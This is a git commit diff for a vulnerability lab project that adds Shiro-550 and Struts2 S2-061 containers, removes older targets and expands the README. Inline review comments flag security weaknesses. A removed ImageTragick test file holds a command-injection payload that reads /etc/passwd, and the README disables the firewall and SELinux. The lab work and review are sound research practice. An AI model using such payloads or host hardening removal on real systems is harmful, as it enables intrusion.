Add Shiro and S2-061 target machines and update the README

This commit is contained in:
wintrysec
2020-12-14 17:35:19 +08:00
parent 011298178b
commit 3ec426e745
18 changed files with 89 additions and 185 deletions

View File

@@ -1,26 +1,81 @@
> **VulnRange的定位是一个漏洞靶场用于快速的启动漏洞环境便于漏洞复现和研究**
使用VulnRange可以快速的部署含有未修复漏洞的Shiro和S2等第三方组件的测试环境方便复现漏洞。
# 安装部署🚀
## 注意事项
> 1. 项目需要放到 `~/` 当前用户目录下
> 2. ubuntu 需要将`start.sh`中的`~/`改为绝对路径,如`/home/ubuntu`
> 3. 关闭Linux防火墙后请重启docker
> 4. python使用python3.8以上版本
> 5. 不建议部署在VPS上小心被人GetShell
## 环境配置
**以Centos为例**
1、[Centos安装python3.8和PIP](https://www.cnblogs.com/wintrysec/p/11963807.html)
1、Centos安装python3.8和PIP
```bash
#安装python3.8
yum -y install yum-utils
yum-builddep python
curl -O https://www.python.org/ftp/python/3.8.0/Python-3.8.0.tgz
tar xf Python-3.8.0.tgz
cd Python-3.8.0
./configure
make
make install
#设置python3.8为默认版本
vi /etc/profile.d/python.sh #编辑用户自定义配置输入alias参数
alias python='/usr/local/bin/python3.8'  #这里写你的python路径
source /etc/profile.d/python.sh #重启会话使配置生效
#安装pip
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py -i https://pypi.tuna.tsinghua.edu.cn/simple/
```
2、安装docker和docker-compose [把docker源换掉推荐阿里云的源]
```bash
#安装docker
yum install -y yum-utils # yum-config-manager需要用这个包
yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo #安装docker官方源
yum makecache
yum -y install docker-ce
systemctl start docker
#安装docker-compose
pip install docker-compose -i https://pypi.mirrors.ustc.edu.cn/simple/
```
更换阿里源:[阿里云帮助手册](https://help.aliyun.com/document_detail/60750.html?spm=a2c4g.11186623.6.553.4851242foO76sC),用淘宝账号登陆后获取一个独有的加速地址
3、关闭防火墙和SELinux
```bash
firewall-cmd --state #查看防火墙状态
systemctl stop firewall.service #停止防火墙
systemctl disable firewall.service #禁止开机启动
vim /etc/selinux/config/
#修改为以下内容
SELINUX=disabled
#然后最好重启一下系统
```
## 下载安装VulnRange
```bash
git clone https://github.com/wgpsec/VulnRange.git
cd VulnRange
pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple/ #安装项目
pip install Flask #自动安装完启动项目Flask报错后更新pip 从新安装Flask即可
pip install Flask #自动安装完启动项目Flask报错后更新pip安装Flask
```
# 功能介绍:memo:
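Review bot: step 3 of the environment setup stops the host firewall and sets `SELINUX=disabled` for the whole machine, which works against note 5 at the top of the same README (do not deploy on a VPS, risk of GetShell). A host that runs deliberately vulnerable containers should keep both enabled and instead restrict who can reach the published ports. If the step stays, two commands in it need fixing: the unit is written `firewall.service`, but CentOS ships it as `firewalld.service`, and `vim /etc/selinux/config/` has a trailing slash although the target is a file. The Python tarball and `get-pip.py` are also downloaded and executed as root without any checksum or signature check; a line verifying the download would be worth adding.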
@@ -60,10 +115,3 @@ sh start.sh
靶机环境构建完成后,点击链接即可访问
![](README/image-20200921222813545.png)
# 注意事项
> 1. 项目需要放到 `~/` 当前用户目录下
> 2. ubuntu 需要将`start.sh`中的`~/`改为绝对路径,如`/home/ubuntu`
> 3. 关闭Linux防火墙后请重启docker

View File

@@ -0,0 +1,7 @@
version: '3'
services:
web:
image: vulhub/shiro:1.2.4
container_name: Shiro-550
ports:
- "8080"
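Review bot: `- "8080"` under `ports:` publishes the container port on a random host port bound to every interface, so this Shiro 1.2.4 instance is reachable by anything that can reach the host, and the README in this commit tells the user to stop the firewall as well. Consider binding the published port to loopback or a lab-only address, for example `"127.0.0.1:8080:8080"`, or stating in the README that the host must sit on an isolated network. If the front end depends on the random host port to build its links, keep that but add the host IP to the mapping.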

View File

@@ -1,16 +0,0 @@
version: '2'
services:
nginx:
image: nginx:1
container_name: CVE-2016-5385
volumes:
- ./www/index.php:/usr/share/nginx/html/index.php
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
depends_on:
- php
ports:
- "80"
php:
image: vulhub/php:httpoxy
volumes:
- ./www/index.php:/var/www/html/index.php
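Review bot: the commit message only mentions adding the Shiro and S2-061 targets and editing the README, but this hunk and the later `+0,0` hunks delete existing targets (container names `CVE-2016-5385`, `CVE-2019-3369`, `ecshop-3.6.0`, `CVE-2017-11610`, `CVE-20163714`) together with their configs and test files. Say in the commit message that these targets are removed and why, or move the removals into their own commit, so that someone looking for a missing environment can find the change in the history.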

View File

@@ -1,26 +0,0 @@
server {
listen 80 default_server;
listen [::]:80 default_server;
root /usr/share/nginx/html;
index index.html index.php;
server_name _;
location / {
try_files $uri $uri/ =404;
}
location ~ [^/]\.php(/|$) {
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param REDIRECT_STATUS 200;
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
fastcgi_param DOCUMENT_ROOT /var/www/html;
fastcgi_pass php:9000;
}
}

View File

@@ -1,20 +0,0 @@
<?php
require __DIR__ . '/vendor/autoload.php';
use GuzzleHttp\Client;
header('Content-Type: application/json; charset=utf-8');
$client = new Client([
// Base URI is used with relative requests
'base_uri' => 'http://httpbin.org',
// You can set any number of default request options.
'timeout' => 2.0,
]);
$response = $client->get('http://httpbin.org/get');
$body = $response->getBody();
echo $body;

View File

@@ -1,14 +0,0 @@
version: '2'
services:
web:
image: vulhub/confluence:6.10.2
container_name: CVE-2019-3369
ports:
- "8090:8090"
depends_on:
- db
db:
image: postgres:10.7-alpine
environment:
- POSTGRES_PASSWORD=postgres
- POSTGRES_DB=confluence

View File

@@ -1,13 +0,0 @@
version: '2'
services:
ecshop36:
image: vulhub/ecshop:3.6.0
container_name: ecshop-3.6.0
depends_on:
- mysql
ports:
- "80"
mysql:
image: mysql:5.5
environment:
- MYSQL_ROOT_PASSWORD=root

View File

@@ -0,0 +1,7 @@
version: '3'
services:
struts2:
image: vulhub/struts2:2.5.25
container_name: s2-061
ports:
- "8080"
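Review bot: `container_name: s2-061` is lower-case while the other target added here is `Shiro-550`, and the targets deleted in this commit were mostly named by CVE id; pick one naming convention so the range's listing and any scripts that match on container names stay predictable. The `- "8080"` mapping also has no host address, so it should get whatever loopback or lab-only binding is chosen for the Shiro file.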

View File

@@ -1,17 +0,0 @@
FROM vulhub/python:2.7
MAINTAINER phithon <root@leavesongs.com>
COPY docker-entrypoint.sh /usr/local/bin/
RUN pip install -U pip \
&& pip install "supervisor==3.3.2" \
&& echo_supervisord_conf | tee /usr/local/etc/supervisord.conf \
&& { \
echo "[inet_http_server]"; \
echo "port=0.0.0.0:9001"; \
echo; \
} | tee -a /usr/local/etc/supervisord.conf \
&& chmod +x /usr/local/bin/docker-entrypoint.sh
CMD ["/usr/local/bin/docker-entrypoint.sh"]

View File

@@ -1,7 +0,0 @@
version: '3'
services:
web:
build: .
container_name: CVE-2017-11610
ports:
- "9001:9001"

View File

@@ -1,5 +0,0 @@
#!/bin/bash
supervisord --user nobody -c /usr/local/etc/supervisord.conf
while true; do sleep 30; done;

View File

@@ -1,5 +0,0 @@
FROM vulhub/imagemagick:6.9.2
MAINTAINER phithon <root@leavesongs.com>
RUN sed -i -e "s/Options -Indexes/Options +Indexes/g" $APACHE_CONFDIR/conf-available/docker-php.conf

View File

@@ -1,9 +0,0 @@
version: '3'
services:
apache:
build: .
container_name: CVE-20163714
volumes:
- ./www:/var/www/html
ports:
- "80"

View File

@@ -1,2 +0,0 @@
<?php
echo shell_exec("/usr/local/bin/identify vul.jpg");

View File

@@ -1,23 +0,0 @@
<?php
if (!empty($_FILES)):
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
die('Unsupported filetype uploaded.');
}
$i = new Imagick($_FILES['file_upload']['tmp_name']);
$size = $i->getSize();
echo "Image size is: ";
print_r($size);
else:
?>
<form method="post" enctype="multipart/form-data">
File: <input type="file" name="file_upload">
<input type="submit">
</form>
<?php
endif;

View File

@@ -1,4 +0,0 @@
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`cat /etc/passwd > /tmp/success`'
pop graphic-context

View File

@@ -34,6 +34,15 @@
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://go.wgpsec.org/" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
<p>
<cite style="font-size: medium">渗透测试导航</cite>
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://github.com/wgpsec/WolfAwd" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
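Review bot: the new `<a href="https://go.wgpsec.org/" target="_blank" ...>` card opens an external site in a new tab without a `rel` attribute. Add `rel="noopener noreferrer"` so the opened page gets no `window.opener` handle back to this admin page on older browsers and receives no Referer; the same applies to the other `target="_blank"` links in this list.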
@@ -42,30 +51,24 @@
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://github.com/wgpsec/Perception" target="_blank" class="x-admin-backlog-body">
<a href="https://github.com/wgpsec/urlscan" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
<p>
<cite style="font-size: medium">Perception</cite>
<cite style="font-size: medium">UrlScan</cite>
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://github.com/wintrysec/webcracker" target="_blank" class="x-admin-backlog-body">
<h3>黎焰攻防实验室</h3>
<a href="https://github.com/wintrysec/WebBrute" target="_blank" class="x-admin-backlog-body">
<h3>狼组安全团队</h3>
<p>
<cite style="font-size: medium">Web后台批量爆破</cite>
</p>
</a>
</li>
<li class="layui-col-md2 layui-col-xs6">
<a href="https://dawnflame.github.io/" target="_blank" class="x-admin-backlog-body">
<h3>黎焰攻防实验室</h3>
<p>
<cite style="font-size: medium">渗透测试导航</cite>
</p>
</a>
</li>
</ul>
</div>

Binary file not shown.